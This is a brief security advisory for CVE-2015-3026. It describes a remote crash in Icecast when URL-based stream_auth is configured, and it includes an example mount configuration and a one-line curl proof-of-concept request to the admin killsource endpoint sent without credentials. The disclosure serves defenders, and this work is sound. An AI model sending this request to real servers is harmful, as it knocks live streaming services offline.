Icecast can be crashed remotely if stream_auth is enabled.
Downstream bug report: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=782120
Icecast can be killed by anyone with a simple HTTP request when is used and a stream_auth handler is defined.
Example configuration:
<mount>
<mount-name>/test.ogg</mount-name>
<authentication type="url">
<option name="stream_auth" value="http://localhost/auth"/>
</authentication>
</mount>
Proof of concept exploit:
curl "http://stream.example.org:8000/admin/killsource?mount=/test.ogg"
This happens if no logon credentials are sent with the request. The crash happens regardless of a source client being connected to the vulnerable mountpoint.
This will be released in a security release 2.4.2 today.
CVE-2015-3026